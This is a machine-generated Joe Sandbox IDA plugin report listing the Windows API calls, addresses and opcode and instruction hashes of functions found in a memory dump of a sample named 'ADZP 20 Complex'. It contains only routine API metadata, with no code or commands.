                    • API String ID: 2472784365-0
                    • Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                    • Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
                    • Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                    • Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • UnregisterWait.KERNEL32(?), ref: 004126AE
                    • CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
                    • HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                    • String ID:
                    • API String ID: 4204870694-0
                    • Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
                    • Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                    • Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                    • memmove.MSVCRT ref: 004058E1
                    • wcsncpy.MSVCRT ref: 004058F9
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memmovewcsncmpwcsncpy
                    • String ID: $0A$$0A
                    • API String ID: 1452150355-167650565
                    • Opcode ID: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
                    • Opcode Fuzzy Hash: b06504f386dc6b7509aa377d402f9f39eb11f5effc5dd8443b7921d35adbde65
                    • Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • memset.MSVCRT ref: 0040553B
                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcmemset
                    • String ID: RtlGetVersion$ntdll.dll
                    • API String ID: 3137504439-1489217083
                    • Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
                    • Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                    • Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcslen.MSVCRT ref: 0040A72B
                    • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
                    • wcscpy.MSVCRT ref: 0040A74C
                    • memset.MSVCRT ref: 0040A77A
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapmemsetwcscpywcslen
                    • String ID: $0A
                    • API String ID: 1807340688-513306843
                    • Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
                    • Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                    • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                    • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Free$Alloc
                    • String ID: $0A
                    • API String ID: 3901518246-513306843
                    • Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
                    • Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,020A9F70), ref: 004054A5
                    • EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                    • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                    • CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3708593966-0
                    • Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
                    • Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                    • LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                    • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
                    • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                    • String ID:
                    • API String ID: 3171405041-0
                    • Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
                    • Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CloseHandle.KERNEL32(020A9F70,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
                    • EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
                    • LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CloseHandle$CriticalSection$EnterLeave
                    • String ID:
                    • API String ID: 10009202-0
                    • Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
                    • Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
                    • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                    • wcscmp.MSVCRT ref: 004096C2
                    • memmove.MSVCRT ref: 004096DA
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                    • String ID: \\?\
                    • API String ID: 2309408642-4282027825
                    • Opcode ID: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
                    • Opcode Fuzzy Hash: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
                    • Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapwcsncpy
                    • String ID:
                    • API String ID: 2304708654-0
                    • Opcode ID: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
                    • Opcode Fuzzy Hash: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
                    • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CharLower
                    • String ID:
                    • API String ID: 1615517891-0
                    • Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
                    • Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
                    • malloc.MSVCRT ref: 00412884
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
                    • malloc.MSVCRT ref: 004128B6
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
                    • Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
                    • malloc.MSVCRT ref: 00412921
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
                    • malloc.MSVCRT ref: 00412950
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
                    • Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SHGetFolderLocation.SHELL32(00000000,020A9F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
                    • wcslen.MSVCRT ref: 0040B01A
                    • CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FolderFreeFromListLocationPathTaskwcslen
                    • String ID:
                    • API String ID: 4012708801-0
                    • Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
                    • Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
                      • Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422
                    • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
                    • EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
                    • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
